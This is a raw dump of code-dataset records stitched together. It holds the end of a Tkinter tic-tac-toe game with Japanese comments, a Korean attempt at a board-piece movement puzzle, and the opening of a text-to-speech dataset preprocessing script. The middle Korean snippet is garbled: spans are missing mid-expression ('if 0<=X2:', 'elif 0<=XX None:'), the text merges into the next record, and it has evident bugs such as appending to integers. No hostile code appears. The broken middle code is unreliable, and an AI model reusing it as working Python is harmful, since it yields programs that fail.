https://kite.com/python/docs/Tkinter.Frame.tkraise\n frame = self.frames[page_name]\n frame.refresh()\n frame.tkraise()\n\n# }}}\n\n\n# シーンの抽象化 {{{\n\nclass Scene(ttk.Frame):\n def __init__(self, *args, parent, controller, **kwargs):\n ttk.Frame.__init__(self, parent, *args, **kwargs)\n self.parent = parent\n self.controller = controller\n self.width = controller.width\n self.height = controller.height\n\n def refresh(self):\n pass\n\n# }}}\n\n\n# シーン : タイトル {{{\n\nclass TitleScene(Scene):\n def __init__(self, parent, controller):\n Scene.__init__(self, parent=parent, controller=controller)\n\n canvas = self.canvas = ttk.Canvas(\n self,\n width=500, height=500, bg=\"black\")\n canvas.pack()\n\n # https://stackoverflow.com/questions/29401873/tkinter-pil-image-not-displaying-inside-of-a-function\n # ものすごい罠. 画像は変数に束縛しておかないと, ガベコレで勝手に消えてしまう\n self.title0_img = ImageTk.PhotoImage(Image.open(\"title1.png\"))\n canvas.create_image(0, 0, image=self.title0_img, anchor=\"nw\")\n\n self.left_logo = MiniLogo(canvas, \"left_logo\")\n\n self.right_logo = MiniLogo(canvas, \"right_logo\")\n\n self.counter = 0\n self.after(1000//60, self.update)\n\n canvas.bind(\"<1>\", lambda ev: controller.raise_frame(\"LevelSelect\"))\n\n def update(self):\n\n M = 300\n self.counter += 1\n self.counter %= M\n\n canvas = self.canvas\n y = self.height - 80 + math.sin(math.pi * 2 * self.counter / M) * 20\n canvas.delete(\"mes\")\n canvas.create_text(\n self.width / 2, y,\n text=\"touch to start\",\n fill=\"white\", tags=\"mes\", font=(\"Molot\", 30))\n\n self.left_logo.pos = (45, y)\n self.right_logo.pos = (self.width - 45, y)\n\n self.after(1000//60, self.update)\n\n def refresh(self):\n pass\n\n\n# }}}\n\n\n# 小さな回るロゴ {{{\n\nclass MiniLogo:\n def __init__(self, canvas, tag):\n self.canvas = canvas\n self.counter = 0\n self.tag = tag\n self.delay = 1000 // 60\n self.pos = (0, 0)\n canvas.after(self.delay, self.rotateOuter)\n\n def my_after(self, M, M2, now, nxt):\n canvas = self.canvas\n if self.counter < M:\n canvas.after(self.delay, now)\n elif self.counter < M2:\n canvas.after(self.delay, now)\n else:\n self.counter = 0\n canvas.after(self.delay, nxt)\n\n # 外側で一回転\n def rotateOuter(self):\n M = 20\n self.counter += 1\n canvas = self.canvas\n tag = self.tag\n c = min(self.counter / M, 1)\n\n canvas.delete(tag)\n\n for i in range(-1, 2):\n for j in range(-1, 2):\n my_polygon(\n canvas,\n (self.pos[0] + i * 12, self.pos[1] + j * 12),\n [(-6, -6), (-6, 6), (6, 6), (6, -6)],\n rotate=2*math.pi*3/4*c,\n fill=\"white\",\n width=2,\n capstyle=\"projecting\", # もはやどこにドキュメントが存在するかわからない\n tags=tag)\n\n self.my_after(M, M * 3, self.rotateOuter, self.shrink)\n\n # 小さくなる\n def shrink(self):\n M = 20\n self.counter += 1\n canvas = self.canvas\n tag = self.tag\n c = min(self.counter / M, 1)\n\n canvas.delete(tag)\n\n for i in range(-1, 2):\n for j in range(-1, 2):\n r = 6 * (1 - c * .4)\n my_polygon(\n canvas,\n (self.pos[0] + i * 12, self.pos[1] + j * 12),\n [(-r, -r), (-r, r), (r, r), (r, -r)],\n fill=\"white\",\n width=2,\n capstyle=\"projecting\",\n tags=tag)\n\n self.my_after(M, M * 3, self.shrink, self.gather)\n\n # 集まる\n def gather(self):\n M = 20\n self.counter += 1\n canvas = self.canvas\n tag = self.tag\n c = min(self.counter / M, 1)\n\n canvas.delete(tag)\n\n for i in range(-1, 2):\n for j in range(-1, 2):\n r = 6 * .6\n my_polygon(\n canvas,\n (\n self.pos[0] + i * 12 * (1 - c),\n self.pos[1] + j * 12 * (1 - c)),\n [(-r, -r), (-r, r), (r, r), (r, -r)],\n fill=\"white\",\n width=2,\n capstyle=\"projecting\",\n tags=tag)\n\n self.my_after(M, M * 3, self.gather, self.rotateInner)\n\n # 内側で回転\n def rotateInner(self):\n M = 20\n self.counter += 1\n canvas = self.canvas\n tag = self.tag\n c = min(self.counter / M, 1)\n\n canvas.delete(tag)\n\n r = 6 * .6\n my_polygon(\n canvas,\n self.pos,\n [(-r, -r), (-r, r), (r, r), (r, -r)],\n fill=\"white\",\n rotate=-math.pi*2/4*3*c,\n width=2,\n capstyle=\"projecting\",\n tags=tag)\n\n self.my_after(M, M * 3, self.rotateInner, self.spread)\n\n # 広がる\n def spread(self):\n M = 20\n self.counter += 1\n canvas = self.canvas\n tag = self.tag\n c = min(self.counter / M, 1)\n\n canvas.delete(tag)\n\n for i in range(-1, 2):\n for j in range(-1, 2):\n r = 6 * .6\n my_polygon(\n canvas,\n (self.pos[0] + i * 12 * c, self.pos[1] + j * 12 * c),\n [(-r, -r), (-r, r), (r, r), (r, -r)],\n fill=\"white\",\n width=2,\n capstyle=\"projecting\",\n tags=tag)\n\n self.my_after(M, M * 3, self.spread, self.expand)\n\n # 大きくなる\n def expand(self):\n M = 20\n self.counter += 1\n canvas = self.canvas\n c = min(self.counter / M, 1)\n tag = self.tag\n\n canvas.delete(tag)\n\n for i in range(-1, 2):\n for j in range(-1, 2):\n r = 6 * (.4 + c * .6)\n my_polygon(\n canvas,\n (self.pos[0] + i * 12, self.pos[1] + j * 12),\n [(-r, -r), (-r, r), (r, r), (r, -r)],\n fill=\"white\",\n width=2,\n capstyle=\"projecting\",\n tags=tag)\n\n self.my_after(M, M * 3, self.expand, self.rotateOuter)\n\n# }}}\n\n\n# シーン : レベルセレクト {{{\n\nclass LevelSelect(Scene):\n def __init__(self, *args, **kwargs):\n Scene.__init__(self, *args, **kwargs)\n\n self.lv1 = LevelSelector(selection, self)\n self.lv1.place(x=30, y=200)\n self.lv2 = LevelSelector(selection, self)\n self.lv2.place(x=260, y=200)\n\n start_btn = MyButton(\n self,\n text=\"start\",\n width=240, height=60,\n command=self.start)\n start_btn.place(x=120, y=420)\n\n card1 = Player(self, text=\"First\", mark=\"o\", col=first_col)\n card1.place(x=30, y=100)\n\n card2 = Player(self, text=\"Second\", mark=\"x\", col=second_col)\n card2.place(x=260, y=100)\n\n self.lv1.set(0)\n self.lv2.set(1)\n\n def start(self, ev):\n self.controller.AI1 = self.lv1.getAI()\n self.controller.AI2 = self.lv2.getAI()\n self.controller.Card1 = self.lv1.getCard()\n self.controller.Card2 = self.lv2.getCard()\n\n self.controller.raise_frame(\"Main\")\n\n def refresh(self):\n pass\n\n# }}}\n\n\n# シーン : ゲーム {{{\n\nclass Main(Scene):\n def __init__(self, *args, **kwargs):\n Scene.__init__(self, *args, **kwargs)\n\n vs = ttk.Canvas(self, width=200, height=100)\n vs.create_text(40, 40, text=\"v\", font=(\"Molot\", 23))\n vs.create_text(60, 50, text=\"s\", font=(\"Molot\", 23))\n vs.place(x=197, y=10)\n\n cells = self.cells = [[None for _ in range(3)] for _ in range(3)]\n\n for i in range(3):\n for j in range(3):\n # クロージャを作る\n cell = cells[i][j] = Cell(\n self,\n width=100, height=100,\n command=(lambda i, j: lambda ev: self.clicked(i, j))\n (i, j))\n cell.place(x=90 + 104*i, y=100 + 104*j)\n cell.setMark(\"o\", first_col)\n\n self.card = [None, None]\n\n self.resign_btn = MyButton(\n self, text=\"resign\",\n width=140, height=60,\n command=self.resign)\n self.help_btn = MyButton(\n self, text=\"help\",\n width=140, height=60,\n command=self.help)\n self.quit_btn = MyButton(\n self, text=\"quit\",\n width=140, height=60,\n command=self.quit)\n\n self.message = None\n\n def human_interface(self, show):\n if show:\n self.resign_btn.place(x=10, y=420)\n self.help_btn.place(x=170, y=420)\n self.quit_btn.place(x=330, y=420)\n else:\n self.resign_btn.place_forget()\n self.help_btn.place_forget()\n self.quit_btn.place_forget()\n\n def over(self):\n self.message = ttk.Canvas(self, width=300, height=100)\n self.message.place(x=20, y=410)\n self.gameover = True\n self.refrectGame()\n self.human_interface(False)\n self.quit_btn.place(x=330, y=420)\n\n def draw(self):\n self.over()\n self.message.create_text(140, 40, text=\"draw\", font=(\"Molot\", 30))\n\n def resigned(self):\n self.over()\n writePlayer(self.message, self.turn, 60, 25, small=True)\n self.message.create_text(190, 25, text=\"resigned.\", font=(\"Molot\", 18))\n writePlayer(self.message, 1 - self.turn, 130, 60)\n self.message.create_text(260, 60, text=\"win\", font=(\"Molot\", 25))\n\n def playerWin(self):\n self.over()\n writePlayer(self.message, self.turn, 70, 40)\n self.message.create_text(200, 40, text=\"win\", font=(\"Molot\", 25))\n\n def refresh(self):\n self.game = Game()\n\n self.AI = [self.controller.AI1, self.controller.AI2]\n\n for c in self.card:\n if c:\n c.place_forget()\n\n if self.message:\n self.message.place_forget()\n\n Card1 = self.controller.Card1\n Card2 = self.controller.Card2\n\n self.card = [Card1(self), Card2(self)]\n\n self.card[0].place(x=20, y=10)\n self.card[1].place(x=270, y=25)\n\n self.is_human = False\n self.gameover = False\n self.turn = 0\n self.turnSetup()\n\n def refrectGame(self):\n for i in range(3):\n for j in range(3):\n w = self.game.get(i, j)\n self.cells[i][j].disabled = not self.is_human or self.gameover\n if w == 0:\n self.cells[i][j].setMark(\n \"o\" if self.turn == 0 else \"x\",\n first_col_light if self.turn == 0\n else second_col_light)\n self.cells[i][j].setDetermined(False)\n elif w == 1:\n self.cells[i][j].setMark(\"o\", first_col)\n self.cells[i][j].setDetermined(True)\n elif w == 2:\n self.cells[i][j].setMark(\"x\", second_col)\n self.cells[i][j].setDetermined(True)\n\n def turnSetup(self):\n self.is_human = self.AI[self.turn].name == \"human\"\n self.opps = 1 - self.turn\n\n self.refrectGame()\n\n self.card[self.turn].setActive(True)\n self.card[self.opps].setActive(False)\n\n self.human_interface(self.is_human)\n\n if not self.is_human:\n self.after(C_DELAY, self.AI_choose)\n\n def AI_choose(self):\n sel = self.AI[self.turn].think(self.turn + 1, self.game)\n if sel is None:\n self.resigned()\n return\n self.game.set(sel[0], sel[1], self.turn + 1)\n self.next()\n\n def clicked(self, i, j):\n if self.game.get(i, j) != 0:\n return\n if not self.is_human or self.gameover:\n return\n self.game.set(i, j, self.turn + 1)\n self.next()\n\n def resign(self, ev):\n if not self.is_human or self.gameover:\n return\n self.resigned()\n\n def help(self, ev):\n if not self.is_human or self.gameover:\n return\n sel = think3(self.turn, self.game, noResign=True)\n self.game.set(sel[0], sel[1], self.turn + 1)\n self.next()\n\n def quit(self, ev):\n if not self.is_human and not self.gameover:\n return\n self.controller.raise_frame(\"TitleScene\")\n\n def next(self):\n ch = self.game.check()\n if ch == 0:\n self.turn = 1 - self.turn\n self.turnSetup()\n elif ch == -1:\n self.draw()\n elif ch == 1 or ch == 2:\n self.playerWin()\n\n# }}}\n\n\n# ボタン {{{\n\nclass MyButton(ttk.Canvas):\n def __init__(\n self, *args, width, height,\n command=None, text=\"\",\n col1=from_rgb((240, 200, 200)),\n col2=from_rgb((240, 160, 160)),\n col3=from_rgb((240, 60, 60)),\n after_moved=None,\n after_leaved=None,\n fontsize=18, **kwargs):\n ttk.Canvas.__init__(self, *args, width=width, height=height, **kwargs)\n\n self.disabled = False\n\n self.width = width\n self.height = height\n\n self.col1 = col1\n self.col2 = col2\n self.col3 = col3\n\n self.after_moved = after_moved\n self.after_leaved = after_leaved\n\n if command:\n self.bind(\"<1>\", command)\n\n self.bind(\"<1>\", self.pressing, add=\"+\")\n self.bind(\"\", self.moved)\n self.bind(\"\", self.moved)\n self.bind(\"\", self.moved)\n self.bind(\"\", self.leaved)\n\n self.leaved(None)\n\n self.text = self.create_text(\n width/2, height/2,\n text=text, font=(\"Molot\", fontsize))\n\n def pressing(self, ev, force=False):\n if self.disabled and not force:\n return\n width, height = self.width, self.height\n self.delete(\"face\")\n self.create_rectangle(\n 4, 4, width, height,\n fill=self.col3,\n outline=from_rgb((120, 120, 120)), width=4, tags=\"face\"\n )\n self.lower(\"face\")\n\n def moved(self, ev, force=False):\n if self.disabled and not force:\n return\n width, height = self.width, self.height\n self.delete(\"face\")\n self.create_rectangle(\n 4, 4, width, height,\n fill=self.col2,\n outline=from_rgb((120, 120, 120)), width=4, tags=\"face\"\n )\n self.lower(\"face\")\n if self.after_moved:\n self.after_moved()\n\n def leaved(self, ev, force=False):\n if self.disabled and not force:\n return\n width, height = self.width, self.height\n self.delete(\"face\")\n self.create_rectangle(\n 4, 4, width, height,\n fill=self.col1,\n outline=from_rgb((120, 120, 120)), width=4, tags=\"face\"\n )\n self.lower(\"face\")\n if self.after_leaved:\n self.after_leaved()\n\n# }}}\n\n\n# セル {{{\n\nclass Cell(MyButton):\n def __init__(self, *args, **kwargs):\n self.determined = False\n self.mark = \"\"\n self.col = \"black\"\n\n MyButton.__init__(\n self, *args,\n col1=\"#EEEEEE\",\n col2=\"#DDDDDD\",\n col3=\"#888888\",\n after_moved=self.after_moved,\n after_leaved=self.after_leaved,\n **kwargs)\n\n self.setDetermined(False)\n\n def setDetermined(self, determined):\n self.determined = determined\n\n if determined:\n self.delete(\"mark\")\n self.create_text(\n 50, 50,\n text=self.mark, font=(\"Molot\", 50),\n tags=\"mark\",\n fill=self.col)\n\n self.col1 = \"#EEEEEE\"\n self.col2 = \"#EEEEEE\"\n self.col3 = \"#EEEEEE\"\n self.leaved(None, force=True)\n else:\n self.col1 = \"#EEEEEE\"\n self.col2 = \"#DDDDDD\"\n self.col3 = \"#888888\"\n self.leaved(None, force=True)\n\n def setMark(self, mark, col):\n self.mark = mark\n self.col = col\n\n def after_moved(self):\n if self.determined:\n return\n self.delete(\"mark\")\n self.create_text(\n 50, 50,\n text=self.mark, font=(\"Molot\", 50),\n tags=\"mark\",\n fill=self.col)\n\n def after_leaved(self):\n if self.determined:\n return\n self.delete(\"mark\")\n\n# }}}\n\n\n# レベルカード {{{\n\nclass Lv1(ttk.Canvas):\n def __init__(\n self, *args, **kwargs):\n self.width = width = 200\n self.height = height = 60\n ttk.Canvas.__init__(self, *args, width=width, height=height, **kwargs)\n\n self.setActive(True)\n\n def setActive(self, active):\n width = self.width\n height = self.height\n\n self.delete(\"all\")\n\n self.create_rectangle(\n 4, 4, width, height,\n fill=from_rgb((240, 240, 200)) if active\n else \"#AAAAAA\",\n outline=\"black\",\n width=4 if active else 1,\n tags=\"face\"\n )\n self.text = self.create_text(\n 20 + width/2, height/2,\n text=\"Lv.1\", font=(\"Molot\", 22))\n r = 4\n square = [(-r, -r), (-r, r), (r, r), (r, -r)]\n\n my_polygon(self, (width/2 - 40, height/2), square)\n\n\nclass Lv2(ttk.Canvas):\n def __init__(\n self, *args, **kwargs):\n self.width = width = 200\n self.height = height = 60\n ttk.Canvas.__init__(self, *args, width=width, height=height, **kwargs)\n\n self.setActive(True)\n\n def setActive(self, active):\n width = self.width\n height = self.height\n\n self.delete(\"all\")\n\n self.create_rectangle(\n 4, 4, width, height,\n fill=from_rgb((240, 200, 160)) if active\n else \"#AAAAAA\",\n outline=\"black\",\n width=4 if active else 1,\n tags=\"face\"\n )\n self.text = self.create_text(\n 20 + width/2, height/2,\n text=\"Lv.2\", font=(\"Molot\", 22))\n r = 4\n square = [(-r, -r), (-r, r), (r, r), (r, -r)]\n\n my_polygon(self, (width/2 - 40, height/2-6), square)\n my_polygon(self, (width/2 - 40 - 8, height/2+8), square)\n my_polygon(self, (width/2 - 40 + 8, height/2+8), square)\n\n\nclass Lv3(ttk.Canvas):\n def __init__(\n self, *args, **kwargs):\n self.width = width = 200\n self.height = height = 60\n ttk.Canvas.__init__(self, *args, width=width, height=height, **kwargs)\n\n self.setActive(True)\n\n def setActive(self, active):\n width = self.width\n height = self.height\n\n self.delete(\"all\")\n\n self.create_rectangle(\n 4, 4, width, height,\n fill=from_rgb((240, 160, 150)) if active\n else \"#AAAAAA\",\n outline=\"black\",\n width=4 if active else 1,\n tags=\"face\"\n )\n self.text = self.create_text(\n 20 + width/2, height/2,\n text=\"Lv.3\", font=(\"Molot\", 22))\n\n r = 2\n square = [(-r, -r), (-r, r), (r, r), (r, -r)]\n my_polygon(self, (width/2 - 40, height/2+2), square)\n\n r = 4\n square = [(-r, -r), (-r, r), (r, r), (r, -r)]\n my_polygon(self, (width/2 - 40, height/2-6), square)\n my_polygon(self, (width/2 - 40 - 8, height/2+8), square)\n my_polygon(self, (width/2 - 40 + 8, height/2+8), square)\n self.create_arc(\n width/2 - 45, height/2 - 3,\n width/2 - 35, height/2 + 7,\n extent=359, style=\"chord\")\n\n\nclass HumanLavel(ttk.Canvas):\n def __init__(\n self, *args, **kwargs):\n self.width = width = 200\n self.height = height = 60\n ttk.Canvas.__init__(self, *args, width=width, height=height, **kwargs)\n\n self.setActive(True)\n\n def setActive(self, active):\n width = self.width\n height = self.height\n\n self.delete(\"all\")\n\n self.create_rectangle(\n 4, 4, width, height,\n fill=from_rgb((200, 240, 240)) if active\n else \"#AAAAAA\",\n outline=\"black\",\n width=4 if active else 1,\n tags=\"face\"\n )\n self.text = self.create_text(\n 20 + width/2, height/2,\n text=\"human\", font=(\"Molot\", 22))\n r = 4\n square = [(-r, -r), (-r, r), (r, r), (r, -r)]\n\n my_polygon(self, (width/2 - 60, height/2 - 10), square)\n self.create_line(\n (width/2 - 60 - 8, height/2 + 8),\n (width/2 - 60, height/2 - 6))\n self.create_line(\n (width/2 - 60 + 8, height/2 + 8),\n (width/2 - 60, height/2 - 6))\n self.create_line(\n (width/2 - 60, height/2 - 6),\n (width/2 - 60, height/2 + 16))\n self.create_line(\n (width/2 - 60, height/2 + 16),\n (width/2 - 60 - 8, height/2 + 16 + 8))\n self.create_line(\n (width/2 - 60, height/2 + 16),\n (width/2 - 60 + 8, height/2 + 16 + 8))\n\n# }}}\n\n\n# レベルセレクタ {{{\n\nclass LevelSelector(ttk.Frame):\n def __init__(self, selection, *args, **kwargs):\n ttk.Frame.__init__(self, *args, **kwargs)\n self.selection = selection\n self.n = len(selection)\n\n # prev ボタン\n prev_btn = self.btn = MyButton(\n self, width=100, height=60,\n text=\"prev\", command=lambda ev: self.prev())\n prev_btn.grid(row=0, column=0)\n\n # next ボタン\n next_btn = self.btn = MyButton(\n self,\n width=100, height=60,\n text=\"next\", command=lambda ev: self.next())\n next_btn.grid(row=2, column=0)\n\n self.cards = []\n for (AI, Card) in selection:\n frame = ttk.Frame(self)\n frame.grid(row=1, column=0, sticky=\"nsew\")\n card = Card(frame)\n card.grid(row=1, column=0, sticky=\"nsew\")\n self.cards.append(frame)\n\n self.index = 0\n self.raiseCard(0)\n\n def raiseCard(self, num):\n assert(0 <= num < self.n)\n self.cards[num].tkraise()\n\n def next(self):\n self.index += 1\n self.index %= self.n\n self.raiseCard(self.index)\n\n def prev(self):\n self.index -= 1\n self.index %= self.n\n self.raiseCard(self.index)\n\n def getAI(self):\n return self.selection[self.index][0]\n\n def getCard(self):\n return self.selection[self.index][1]\n\n def set(self, index):\n self.index = index\n self.raiseCard(self.index)\n\n# }}}\n\n\n# AIのセットアップ {{{\n\nhuman = (GameAI(None, \"human\"), HumanLavel)\nAI1 = (GameAI(think1, \"computer (level1)\"), Lv1)\nAI2 = (GameAI(think2, \"computer (level2)\"), Lv2)\nAI3 = (GameAI(think3, \"computer (level3)\"), Lv3) # TODO\n\nselection = [human, AI1, AI2, AI3]\n\n# }}}\n\n\n# プレイヤーカード {{{\n\n# 先手/後手 流用\nclass Player(ttk.Frame):\n def __init__(self, *args, text, mark, col, **kwargs):\n ttk.Frame.__init__(self, *args, **kwargs)\n self.width = width = 200\n self.height = height = 80\n\n canvas = ttk.Canvas(self, width=width, height=height)\n canvas.grid()\n\n canvas.create_rectangle(\n 4, 4, width, height,\n fill=from_rgb((240, 240, 240)),\n outline=\"black\", width=4, tags=\"face\"\n )\n canvas.create_text(\n width/2 - 20, height/2,\n text=text, font=(\"Molot\", 22))\n canvas.create_text(\n width/2 + 50, height/2,\n text=mark, font=(\"Molot\", 40),\n fill=col)\n\n# }}}\n\n\n# メインループ\nif __name__ == \"__main__\":\n app = TicTacToe()\n app.mainloop()\n","repo_name":"LumaKernel/python-ttt","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":32310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36029416838","text":"#내는,,,이거,,,못하겠다,,,\n\nn,k=map(int,input().split())\nboard=[]\nunit=[]\ntmp_board,tmp_order=[],[]\nd=[(),(0,1),(0,-1),(-1,0),(1,0)]\nfor _ in range(n):\n board.append(list(map(int,input().split())))\nfor _ in range(k):\n unit.append(list(map(int,input().split())))\n\ntmp_board = [[0 for _ in range(n)] for _ in range(n)]\n\nfor i in range(k): # 최초로 채움\n x, y, directions = unit[i]\n tmp_board[x][y].append((i, directions))\n\nwhile True:\n\n for i in range(k): #각 말들 이동\n x, y, directions = unit[i]\n X=x+d[directions][0]\n Y=y+d[directions][1]\n if 0<=X2: #2개이상 겹쳐져있다면\n for ii in len(tmp_board[x][y]):\n if tmp_board[x][y][0]==i: #그 위의것들 이동\n info=tmp_board[x][y][ii:]\n tmp_board[x][y]=tmp_board[x][y][:ii]\n break\n if board[X][Y]!=2:\n tmp_board[X][Y].extend(info)\n unit[i] = (X, Y, directions) # 말이 있는 곳\n if board[X][Y]==1:\n tmp_board[X][Y]=tmp_board[X][Y].reverse()\n print(X,Y,'위치에 1 발견, 그자리 리버스')\n print(tmp_board[X][Y])\n\n else:\n if directions == 1: new_dir = 2 # 방향 반대로 바꾸기 (식으로 표현을 못하겠어서 일일히 만듬)\n elif directions == 2: new_dir = 1\n elif directions == 3: new_dir = 4\n else: new_dir = 3\n XX,YY=x+d[new_dir][0],y+d[new_dir][1]\n info[0]=(i,new_dir)\n if board[XX][YY]==2: #튕긴쪽도 파란색이라면\n tmp_board[x][y].extend(info)\n unit[i] = (x, y, new_dir)\n elif 0<=XX None:\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument(\r\n \"--input-dir\", required=True, help=\"Directory with audio dataset\"\r\n )\r\n parser.add_argument(\r\n \"--output-dir\",\r\n required=True,\r\n help=\"Directory to write output files for training\",\r\n )\r\n parser.add_argument(\"--language\", required=True, help=\"eSpeak-ng voice\")\r\n parser.add_argument(\r\n \"--sample-rate\",\r\n type=int,\r\n required=True,\r\n help=\"Target sample rate for voice (hertz)\",\r\n )\r\n parser.add_argument(\r\n \"--dataset-format\", choices=(\"ljspeech\", \"mycroft\"), required=True\r\n )\r\n parser.add_argument(\"--cache-dir\", help=\"Directory to cache processed audio files\")\r\n parser.add_argument(\"--max-workers\", type=int)\r\n parser.add_argument(\r\n \"--single-speaker\", action=\"store_true\", help=\"Force single speaker dataset\"\r\n )\r\n parser.add_argument(\r\n \"--speaker-id\", type=int, help=\"Add speaker id to single speaker dataset\"\r\n )\r\n parser.add_argument(\r\n \"--debug\", action=\"store_true\", help=\"Print DEBUG messages to the console\"\r\n )\r\n args = parser.parse_args()\r\n\r\n if args.single_speaker and (args.speaker_id is not None):\r\n _LOGGER.fatal(\"--single-speaker and --speaker-id cannot both be provided\")\r\n return\r\n\r\n level = logging.DEBUG if args.debug else logging.INFO\r\n logging.basicConfig(level=level)\r\n logging.getLogger().setLevel(level)\r\n\r\n # Prevent log spam\r\n logging.getLogger(\"numba\").setLevel(logging.WARNING)\r\n\r\n # Convert to paths and create output directories\r\n args.input_dir = Path(args.input_dir)\r\n args.output_dir = Path(args.output_dir)\r\n args.output_dir.mkdir(parents=True, exist_ok=True)\r\n\r\n args.cache_dir = (\r\n Path(args.cache_dir)\r\n if args.cache_dir\r\n else args.output_dir / \"cache\" / str(args.sample_rate)\r\n )\r\n args.cache_dir.mkdir(parents=True, exist_ok=True)\r\n\r\n if args.dataset_format == \"mycroft\":\r\n make_dataset = mycroft_dataset\r\n else:\r\n make_dataset = ljspeech_dataset\r\n\r\n # Count speakers\r\n _LOGGER.debug(\"Counting number of speakers/utterances in the dataset\")\r\n speaker_counts: Counter[str] = Counter()\r\n num_utterances = 0\r\n for utt in make_dataset(args.input_dir, args.single_speaker, args.speaker_id):\r\n speaker = utt.speaker or \"\"\r\n speaker_counts[speaker] += 1\r\n num_utterances += 1\r\n\r\n assert num_utterances > 0, \"No utterances found\"\r\n\r\n is_multispeaker = len(speaker_counts) > 1\r\n speaker_ids: Dict[str, int] = {}\r\n\r\n if is_multispeaker:\r\n _LOGGER.info(\"%s speakers detected\", len(speaker_counts))\r\n\r\n # Assign speaker ids by most number of utterances first\r\n for speaker_id, (speaker, _speaker_count) in enumerate(\r\n speaker_counts.most_common()\r\n ):\r\n speaker_ids[speaker] = speaker_id\r\n else:\r\n _LOGGER.info(\"Single speaker dataset\")\r\n\r\n # Write config\r\n with open(args.output_dir / \"config.json\", \"w\", encoding=\"utf-8\") as config_file:\r\n json.dump(\r\n {\r\n \"audio\": {\r\n \"sample_rate\": args.sample_rate,\r\n },\r\n \"espeak\": {\r\n \"voice\": args.language,\r\n },\r\n \"inference\": {\"noise_scale\": 0.667, \"length_scale\": 1, \"noise_w\": 0.8},\r\n \"phoneme_map\": {},\r\n \"phoneme_id_map\": DEFAULT_PHONEME_ID_MAP,\r\n \"num_symbols\": len(\r\n set(itertools.chain.from_iterable(DEFAULT_PHONEME_ID_MAP.values()))\r\n ),\r\n \"num_speakers\": len(speaker_counts),\r\n \"speaker_id_map\": speaker_ids,\r\n },\r\n config_file,\r\n ensure_ascii=False,\r\n indent=4,\r\n )\r\n _LOGGER.info(\"Wrote dataset config\")\r\n\r\n if (args.max_workers is None) or (args.max_workers < 1):\r\n args.max_workers = os.cpu_count()\r\n\r\n assert args.max_workers is not None\r\n\r\n batch_size = int(num_utterances / (args.max_workers * 2))\r\n queue_in: \"Queue[Iterable[Utterance]]\" = JoinableQueue()\r\n queue_out: \"Queue[Optional[Utterance]]\" = Queue()\r\n\r\n # Start workers\r\n processes = [\r\n Process(target=process_batch, args=(args, queue_in, queue_out))\r\n for _ in range(args.max_workers)\r\n ]\r\n for proc in processes:\r\n proc.start()\r\n\r\n _LOGGER.info(\r\n \"Processing %s utterance(s) with %s worker(s)\", num_utterances, args.max_workers\r\n )\r\n with open(args.output_dir / \"dataset.jsonl\", \"w\", encoding=\"utf-8\") as dataset_file:\r\n for utt_batch in batched(\r\n make_dataset(args.input_dir, args.single_speaker, args.speaker_id),\r\n batch_size,\r\n ):\r\n queue_in.put(utt_batch)\r\n\r\n _LOGGER.debug(\"Waiting for jobs to finish\")\r\n for _ in range(num_utterances):\r\n utt = queue_out.get()\r\n if utt is not None:\r\n if utt.speaker is not None:\r\n utt.speaker_id = speaker_ids[utt.speaker]\r\n\r\n # JSONL\r\n json.dump(\r\n dataclasses.asdict(utt),\r\n dataset_file,\r\n ensure_ascii=False,\r\n cls=PathEncoder,\r\n )\r\n print(\"\", file=dataset_file)\r\n\r\n # Signal workers to stop\r\n for proc in processes:\r\n queue_in.put(None)\r\n\r\n # Wait for workers to stop\r\n for proc in processes:\r\n proc.join(timeout=1)\r\n\r\n\r\n# -----------------------------------------------------------------------------\r\n\r\n\r\ndef process_batch(args: argparse.Namespace, queue_in: JoinableQueue, queue_out: Queue):\r\n try:\r\n silence_detector = make_silence_detector()\r\n phonemizer = Phonemizer(default_voice=args.language)\r\n\r\n while True:\r\n utt_batch = queue_in.get()\r\n if utt_batch is None:\r\n break\r\n\r\n for utt in utt_batch:\r\n try:\r\n _LOGGER.debug(utt)\r\n utt.phonemes = phonemize(utt.text, phonemizer)\r\n utt.phoneme_ids = phonemes_to_ids(utt.phonemes)\r\n utt.audio_norm_path, utt.audio_spec_path = cache_norm_audio(\r\n utt.audio_path,\r\n args.cache_dir,\r\n silence_detector,\r\n args.sample_rate,\r\n )\r\n queue_out.put(utt)\r\n except TimeoutError:\r\n _LOGGER.error(\"Skipping utterance due to timeout: %s\", utt)\r\n except Exception:\r\n _LOGGER.exception(\"Failed to process utterance: %s\", utt)\r\n queue_out.put(None)\r\n\r\n queue_in.task_done()\r\n except Exception:\r\n _LOGGER.exception(\"process_batch\")\r\n\r\n\r\n# -----------------------------------------------------------------------------\r\n\r\n\r\n@dataclass\r\nclass Utterance:\r\n text: str\r\n audio_path: Path\r\n speaker: Optional[str] = None\r\n speaker_id: Optional[int] = None\r\n phonemes: Optional[List[str]] = None\r\n phoneme_ids: Optional[List[int]] = None\r\n audio_norm_path: Optional[Path] = None\r\n audio_spec_path: Optional[Path] = None\r\n\r\n\r\nclass PathEncoder(json.JSONEncoder):\r\n def default(self, o):\r\n if isinstance(o, Path):\r\n return str(o)\r\n return super().default(o)\r\n\r\n\r\ndef ljspeech_dataset(\r\n dataset_dir: Path, is_single_speaker: bool, speaker_id: Optional[int] = None\r\n) -> Iterable[Utterance]:\r\n # filename|speaker|text\r\n # speaker is optional\r\n metadata_path = dataset_dir / \"metadata.csv\"\r\n assert metadata_path.exists(), f\"Missing {metadata_path}\"\r\n\r\n wav_dir = dataset_dir / \"wav\"\r\n if not wav_dir.is_dir():\r\n wav_dir = dataset_dir / \"wavs\"\r\n\r\n with open(metadata_path, \"r\", encoding=\"utf-8\") as csv_file:\r\n reader = csv.reader(csv_file, delimiter=\"|\")\r\n for row in reader:\r\n assert len(row) >= 2, \"Not enough colums\"\r\n\r\n speaker: Optional[str] = None\r\n if is_single_speaker or (len(row) == 2):\r\n filename, text = row[0], row[-1]\r\n else:\r\n filename, speaker, text = row[0], row[1], row[-1]\r\n\r\n # Try file name relative to metadata\r\n wav_path = metadata_path.parent / filename\r\n\r\n if not wav_path.exists():\r\n # Try with .wav\r\n wav_path = metadata_path.parent / f\"{filename}.wav\"\r\n\r\n if not wav_path.exists():\r\n # Try wav/ or wavs/\r\n wav_path = wav_dir / filename\r\n\r\n if not wav_path.exists():\r\n # Try with .wav\r\n wav_path = wav_dir / f\"{filename}.wav\"\r\n\r\n if not wav_path.exists():\r\n _LOGGER.warning(\"Missing %s\", filename)\r\n continue\r\n\r\n yield 